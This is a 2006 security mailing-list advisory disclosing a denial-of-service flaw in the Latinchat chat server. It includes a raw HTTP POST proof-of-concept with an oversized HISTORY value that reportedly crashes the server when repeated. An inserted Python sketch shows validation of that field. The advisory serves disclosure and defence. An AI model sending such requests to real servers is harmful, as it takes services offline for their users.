[VulnWatch] Latinchat Denial Of Service

From: Vicente Perez (vp.vicenteperez@private)
Date: Wed Aug 09 2006 - 00:04:26 PDT


Denial Of Service on Chat Magma Latinchat
http://www.latinchat.com
 
Researcher: Vicente Perez
 
1.-Overview
 
Latinchat is one of the best-known chat servers, used mainly by
Latin American people.
 
2.-Description

This system has a DoS vulnerability that takes the system offline for a while.

The failure happens because the history variable is not properly checked by
the system; a request modified by a malicious user can take the system
down. The history variable is used to show the last X messages sent to the
room before the connection takes place.

A PoC has been written as:

POST /JAVA HTTP/1.0
User-Agent: Mozilla/4.0 (compatible; MSIE 5.01; Windows 98)
Referer: http://www.disp006-org.latinchat.com
Content-length: 142

UserName=Pentest&SessionID=C247b19b2a&TEMPLATE=2&RoomID=R29_6-1&HISTORY=999999999999999999999999999999999999999999999999999999999999999999999

When this URL is sent a specified number of times, the server crashes.
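
The missing check described above, sketched as server-side validation of the HISTORY field. This is an added example, not part of the original advisory and not the vendor's code; the function names and the limits (MAX_HISTORY, MAX_DIGITS, MAX_BODY_LEN) are assumptions chosen for illustration.

```python
from urllib.parse import parse_qs

MAX_HISTORY = 50      # assumed cap on replayed messages; not from the advisory
MAX_DIGITS = 4        # refuse long digit strings before converting them
MAX_BODY_LEN = 1024   # assumed upper bound for a join request body


class BadRequest(ValueError):
    """Raised when the join request must be refused (HTTP 400)."""


def parse_history(raw):
    """Return a safe message count for the HISTORY field."""
    if raw is None or raw == "":
        return 0                       # no history requested
    # isascii() + isdigit() rejects signs, whitespace and Unicode digits
    if not (raw.isascii() and raw.isdigit()):
        raise BadRequest("HISTORY must be a non-negative integer")
    if len(raw) > MAX_DIGITS:
        raise BadRequest("HISTORY out of range")
    return min(int(raw), MAX_HISTORY)  # clamp instead of trusting the client


def history_from_body(body):
    """Parse a form-encoded join request and return the validated HISTORY."""
    if len(body) > MAX_BODY_LEN:
        raise BadRequest("request body too large")
    fields = parse_qs(body, keep_blank_values=True, max_num_fields=16)
    values = fields.get("HISTORY", [])
    if len(values) > 1:
        raise BadRequest("duplicate HISTORY field")
    return parse_history(values[0] if values else None)


# Constructed sample bodies; the second has the shape of the advisory's request.
NORMAL = "UserName=Pentest&SessionID=C247b19b2a&TEMPLATE=2&RoomID=R29_6-1&HISTORY=20"
OVERSIZED = NORMAL.rsplit("=", 1)[0] + "=" + "9" * 69

if __name__ == "__main__":
    print(history_from_body(NORMAL))
    try:
        history_from_body(OVERSIZED)
    except BadRequest as exc:
        print("rejected:", exc)
```
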

4.- Disclosure Timeline
Vendor contacted: 08-July-2006. Vendor never responded.
Public advisory: 08-August-2006
 
5.- Copyright
 
http://www.securitynation.com - Security Nation is a Lab Supported by
RISS Security Services.
http://www.riss.com.mx
vicente.perez@private
Copyright SecurityNation.   
Contact: vp.vicenteperez@private






This archive was generated by hypermail 2.1.3 : Wed Aug 09 2006 - 18:10:03 PDT